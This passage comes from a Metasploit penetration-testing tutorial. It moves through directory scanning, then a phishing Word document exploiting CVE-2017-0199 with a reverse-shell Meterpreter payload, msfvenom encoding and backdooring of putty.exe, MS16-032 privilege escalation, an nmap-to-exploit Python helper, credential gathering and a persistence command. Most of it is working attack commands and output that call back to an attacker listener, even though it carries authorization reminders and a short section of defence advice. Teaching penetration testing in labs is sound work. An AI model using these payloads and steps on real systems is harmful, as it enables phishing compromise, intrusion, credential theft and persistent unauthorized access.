RHOSTS => 192.168.1.200
msf6 auxiliary(scanner/http/dir_scanner) > set RPORT 80
RPORT => 80
msf6 auxiliary(scanner/http/dir_scanner) > set THREADS 20
THREADS => 20
# The word list goes in DICTIONARY; PATH is the base path under which the names are tried (default /)
msf6 auxiliary(scanner/http/dir_scanner) > set DICTIONARY /usr/share/wordlists/dirb/common.txt
DICTIONARY => /usr/share/wordlists/dirb/common.txt
# 3. Run the scan
msf6 auxiliary(scanner/http/dir_scanner) > run
[*] Detecting error code
[*] Using code '404' as not found for 192.168.1.200
[*] Found http://192.168.1.200:80/admin/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/backup/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/config/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/phpmyadmin/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/upload/ 200 (192.168.1.200)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The module first requests a random name to learn what "not found" looks like on this server. If the application answers 200 for everything (a catch-all route), every word-list entry shows up as "Found" and the output is noise; compare response sizes, or use a tool with content-based filtering such as ffuf or gobuster, in that case.
Part 4: Advanced techniques: social engineering and persistence
4.1 Social engineering: generating a malicious document
bash
# 1. Generate a Word document that loads an HTA through the OLE handler (CVE-2017-0199)
msf6 > use exploit/windows/fileformat/office_word_hta
# 2. Configure it
msf6 exploit(windows/fileformat/office_word_hta) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/fileformat/office_word_hta) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/fileformat/office_word_hta) > set FILENAME 重要通知.doc
FILENAME => 重要通知.doc
# 3. Generate the document
msf6 exploit(windows/fileformat/office_word_hta) > exploit
[*] Creating '重要通知.doc' file ...
[+] 重要通知.doc stored at /root/.msf4/local/重要通知.doc
Attack flow:
- Deliver the generated document to the target user (the file name 重要通知.doc means "Important notice")
- When the user opens it, Word fetches and runs the HTA, which executes the payload
- A Meterpreter session opens on the attacker's handler
Two things the flow leaves implicit. The document only contains a link: the module keeps an HTTP server running on SRVHOST/SRVPORT to serve the HTA, and the reverse-TCP handler stays up in the same console, so both must be reachable from the victim at the moment the document is opened. And the technique only works on Office builds without the April 2017 fix for CVE-2017-0199; a patched Office does not execute the linked HTA automatically.
4.2 Payload encoding and "AV evasion"
bash
# 1. Generate an encoded payload with msfvenom (shikata_ga_nai, 10 iterations)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe
# 2. Chain two encoders: the first stage must be emitted as raw bytes, and the second must read the payload from stdin (-p -) and be told the arch and platform
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -a x86 --platform windows -e x86/countdown -i 5 -f exe -o payload_encoded.exe
# 3. Inject into a legitimate program used as a template (-k keeps the original program running in its own thread, so putty still works)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -x /usr/share/windows-binaries/putty.exe -k -f exe -o putty_backdoor.exe
Do not expect any of this to get past current antivirus or EDR. Encoders exist to avoid bad characters in an exploit buffer, not to evade detection: the shikata_ga_nai decoder stub, the Meterpreter stager and msfvenom's PE template are all signatured, and behavioural detection catches the reverse connection and the reflective DLL load regardless of encoding. Real evasion work means custom loaders, in-memory execution and testing against the target's actual product, and it belongs in a scoped red-team engagement rather than a tutorial.
4.3 Local privilege escalation
bash
# In an existing Meterpreter session; this time a low-privilege one, such as the session a phishing document yields
# 1. Check the current privilege level
meterpreter > getuid
Server username: WIN7-PC\User
# 2. Background the session before using a local exploit module
meterpreter > background
[*] Backgrounding session 1...
# List the local exploit modules for Windows
msf6 > search platform:windows type:exploit local
# 3. Try MS16-032 (Secondary Logon handle leak)
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
# 4. Configure it: SESSION is the low-privilege session, and the payload architecture must match that session's process
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5555
LPORT => 5555
# 5. Run it
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 192.168.1.10:5555
[*] Writing payload : 738 bytes...
[*] Exploit completed, but no session was created.
The attempt above failed, and that is the normal outcome of guessing at a privilege-escalation module. Typical causes: the target has the March 2016 patch for MS16-032; the session lives in a 32-bit process on a 64-bit host while the payload is x64; or the new listener on port 5555 is unreachable. Instead of guessing, run post/multi/recon/local_exploit_suggester against the session (set SESSION 1, then run): it lists the local exploits whose check reports the host as vulnerable. Note also that this step is only needed when the foothold is a user-level session; EternalBlue in Part 1 yields SYSTEM directly.
Part 5: Putting it together: a complete penetration-test workflow
5.1 Information gathering
bash
# 1. Port scan with nmap. SYN scan and OS detection need root; -p- covers all 65535 ports, which is slow across a /24. Running the same scan as "db_nmap" inside msfconsole stores the results in the Metasploit database
sudo nmap -sS -sV -O -p- 192.168.1.0/24
# 2. Scanning with Metasploit's own auxiliary modules
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 100
msf6 auxiliary(scanner/portscan/tcp) > run
# 3. Service version identification
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run
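The step from scan output to module selection is usually done by eye; it is more reliable as a small rule set over nmap's XML output. The following is an added example written for this article, not nmap or Metasploit code. It parses an "-oX" file, lists the open ports per live host, and proposes the checks and exploits used earlier in this article where the banner matches. The XML is constructed to resemble the lab hosts rather than a real scan, and the rule table is an assumption: a match is a lead to verify with the module's check or scanner, not a confirmed vulnerability (the Samba prefix rule in particular is deliberately loose; only 3.0.20 through 3.0.25rc3 are affected).

```python
"""From nmap XML to a Metasploit to-do list.

Added example for this article (not nmap or Metasploit code). Parses nmap
-oX output and proposes the modules used in this article where a banner
matches. SAMPLE_NMAP_XML is constructed; RULES is an assumed mapping, and
every hit still needs the module's own check before exploitation.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -sV -O -p- -oX scan.xml 192.168.1.0/24">
  <host><status state="up"/>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <hostnames><hostname name="WIN7-PC" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows 7 SP1" accuracy="98"/></os>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.150" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
  <host><status state="down"/><address addr="192.168.1.200" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_nmap_xml(text: str) -> List[Dict]:
    """One record per live host: ip, hostname, OS guess and the open ports with their banners."""
    hosts = []
    for h in ET.fromstring(text).findall("host"):
        if h.find("status").get("state") != "up":
            continue
        addr = next(a.get("addr") for a in h.findall("address") if a.get("addrtype") == "ipv4")
        name = h.find("hostnames/hostname")
        osm = h.find("os/osmatch")
        ports = []
        for p in h.findall("ports/port"):
            if p.find("state").get("state") != "open":
                continue
            svc = p.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            ports.append({"port": int(p.get("portid")), "proto": p.get("protocol"),
                          "service": get("name"), "product": get("product"), "version": get("version")})
        hosts.append({"ip": addr, "hostname": name.get("name") if name is not None else "",
                      "os": osm.get("name") if osm is not None else "", "ports": ports})
    return hosts


# (predicate over (host, port record), module): an assumed mapping built from this article's cases.
RULES = [
    (lambda h, p: p["port"] == 445 and "windows" in (h["os"] + p["product"]).lower(),
     "auxiliary/scanner/smb/smb_ms17_010"),
    (lambda h, p: p["product"].lower() == "vsftpd" and p["version"] == "2.3.4",
     "exploit/unix/ftp/vsftpd_234_backdoor"),
    (lambda h, p: "samba" in p["product"].lower() and p["version"].startswith("3.0.2"),
     "exploit/multi/samba/usermap_script"),
]


def suggest_modules(hosts: List[Dict]) -> Dict[str, List[str]]:
    """Map each host IP to the modules worth trying against it (deduplicated, in rule order)."""
    out: Dict[str, List[str]] = {}
    for h in hosts:
        for p in h["ports"]:
            for pred, module in RULES:
                if pred(h, p) and module not in out.setdefault(h["ip"], []):
                    out[h["ip"]].append(module)
    return out


if __name__ == "__main__":
    for ip, mods in suggest_modules(parse_nmap_xml(SAMPLE_NMAP_XML)).items():
        print(ip, "->", ", ".join(mods))
```

The Windows host gets the MS17-010 scanner, not the exploit, on purpose: the scanner is safe and the exploit is not, so the rule table should always hand you the check first. Extending RULES is where the real value lies; every banner-to-module pairing you confirm on an engagement becomes a line in the table.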
5.2 Vulnerability scanning
bash
# 1. Load the Nessus plugin (it drives a Nessus server over its API; connect with nessus_connect before scanning)
msf6 > load nessus
[*] Nessus Bridge for Metasploit 1.2.1
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
# 2. Load the OpenVAS plugin
msf6 > load openvas
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*] Successfully loaded plugin: openvas
5.3 Exploitation
Pick exploit modules based on the scan results, as shown earlier for EternalBlue and the Samba bug. Where a module supports it (the "Check" column in search output), run its check command first, and prefer scanners and checks over exploits against anything that is not a lab machine.
5.4 Post-exploitation
bash
# 1. Gather credentials and context
meterpreter > run post/windows/gather/credentials/windows_autologin
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
# 2. Enumerate the domain before moving laterally. These modules only enumerate; lateral movement itself reuses the gathered credentials over psexec, WinRM or RDP
meterpreter > run post/windows/gather/enum_ad_users
meterpreter > run post/windows/gather/enum_ad_computers
# 3. Persistence (legacy script; see the caveat in 1.5)
meterpreter > run persistence -U -i 60 -p 4444 -r 192.168.1.10
六、注意事项与防御建议
6.1 攻击注意事项
-
合法授权:只在获得书面授权的环境中进行测试
-
影响评估:了解攻击可能造成的影响,避免生产环境崩溃
-
数据备份:攻击前备份重要数据
-
时间选择:在业务低峰期进行测试
-
记录日志:详细记录每一步操作
6.2 防御建议
-
及时更新:定期安装系统补丁
-
最小权限:遵循最小权限原则
-
网络隔离:划分网络安全区域
-
安全监控:部署IDS/IPS系统
-
安全意识:加强员工安全意识培训
Part 7: MSF command cheat sheet
bash
# Basics
version         # Show the Metasploit version
banner          # Show the banner
help            # Show help
history         # Show command history
# Module management
use             # Select a module
back            # Leave the current module context
search          # Search for modules
info            # Show module information
show options    # Show module options
show payloads   # Show compatible payloads
# Session management
sessions        # List sessions
sessions -i ID  # Interact with a session
background      # Background the current session
sessions -k ID  # Kill a session
# Database
db_status       # Show database connection status
db_nmap         # Run nmap and import the results
db_import       # Import scan results (nmap XML, Nessus, and others)
hosts           # List hosts (db_hosts in old releases)
services        # List services (db_services in old releases)
Summary
The cases above should give you a working understanding of how Metasploit is used in practice. From information gathering through vulnerability scanning, exploitation and post-exploitation, MSF covers the whole penetration-testing workflow. Technology is neutral; what matters is the intent of the person using it. Apply what you have learned to authorised security testing and to defence.
Suggested learning path:
- Build a virtual lab
- Practise with the basic modules first
- Reproduce classic vulnerabilities
- Combine several techniques in one engagement
- Learn to write your own modules
- Take part in CTFs and vulnerability research
Security is a field that keeps moving; only continuous study and practice keep your skills current. Good luck on the road ahead.
Final reminder: everything in this article is for learning and for defence. Unauthorised testing is illegal; learn and practise only through legitimate channels.
Use your skills to make the network safer, not more dangerous. Every technical person shares the responsibility for protecting users' security and privacy.
On the road of security, walk the right path.